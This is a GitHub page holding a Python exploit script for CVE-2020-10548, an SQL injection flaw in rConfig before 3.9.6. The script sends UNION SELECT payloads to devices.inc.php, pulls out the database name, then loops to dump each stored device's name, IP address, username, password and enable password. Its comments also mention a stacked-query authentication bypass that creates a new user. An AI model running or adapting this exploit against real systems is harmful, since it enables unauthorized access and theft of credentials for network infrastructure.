-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2020-10548.py
68 lines (57 loc) · 2.27 KB
/
CVE-2020-10548.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/python3
# CVE-2020-10548
# author https://github.com/theguly/
#
# this method is very similar to one already published by v1k1ngfr for his CVE-2020-10220 (https://github.com/v1k1ngfr/exploits-rconfig)
# as he published, because of PDO DB Class SNAFU, you could also stack two queries having a plain INSERT and achieve auth bypass by creating a new user
#
# i wanted to have different py script foreach CVE, to have a proper listing on github.
# i'd prefer a all-in-one script with proper align for the different union arguments, but i expect i won't use this script anymore so i'll deal with it.
#
# tested with rConfig < 3.9.6
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
burl = """/devices.inc.php?search=True&searchField=antani'+%s&searchColumn=n.id&searchOption=contains"""
ulen = 10
if len(sys.argv) < 2:
print('use: ./{} target'.format(sys.argv[0]))
print('./{} https://1.2.3.4/'.format(sys.argv[0]))
sys.exit()
url = sys.argv[1] + burl
s = requests.Session()
s.verify = False
def getInfo(purl):
r = s.get(purl)
if '[PWN]' in str(r.text):
ret = str(r.text).split('[PWN]')[1]
return ret
else:
return False
def askContinue(msg):
c = input('[-] '+msg+' (Y/n)')
if 'n' in c.lower():
sys.exit()
# find current db name
print("[+] extracting rconfig db: ",end='')
payload = "union+select+(select+concat(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)+limit+0,1)"+",NULL" * (ulen - 1) +"+--+"
purl = url % payload
dbname = getInfo(purl)
print(dbname)
# dump all devices ip,username,password,enablepass
print("[+] dumping nodes: ")
print('devicename:ip:username:password:enablepass')
print('------------------------------------------')
i=0
while True:
if i > 0 and not i % 10:
askContinue('Continue?')
payload ="union+all+select+(select+concat(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)+FROM+"+dbname+".nodes+limit+"+str(i)+","+str(i+1)+")"+",NULL" * (ulen - 1)+"+--+"
purl = url % payload
n = getInfo(purl)
if not n:
askContinue('it could be possible that we don\'t have more devices. continue?')
print(n)
i = i + 1
sys.exit()